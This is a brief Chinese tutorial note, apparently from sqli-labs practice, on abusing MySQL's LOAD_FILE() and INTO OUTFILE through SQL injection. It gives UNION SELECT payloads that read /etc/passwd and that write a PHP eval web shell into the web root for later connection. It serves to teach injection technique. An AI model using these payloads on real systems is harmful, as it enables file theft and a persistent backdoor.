1.文件读取函数load_file()
LOAD_FILE()函数读取一个文件并将其内容作为字符串返回
LOAD_FILE(file_name); LOAD_FILE(/etc/passwd);
其中file_name是文件的完整路径
2.写入函数为into outfile()
INTO OUTFILE()函数将自定义字符串写入指定文件中 (前提权限允许写入)
SELECT … INTO OUTFILE ‘file_name’ SELECT … INTO OUTFILE ‘/tmp/111’
load_file读取文件
Union select 1,load_file("/etc/passwd")--+
写入木马文件
Union select 1,"<?php @eval($_POST[x])?>",1 into outfile '/var/www/html/Less-1/1.php'--+
进行连接即可 但是需要网站文件夹有写的权限 如果没有就会提示
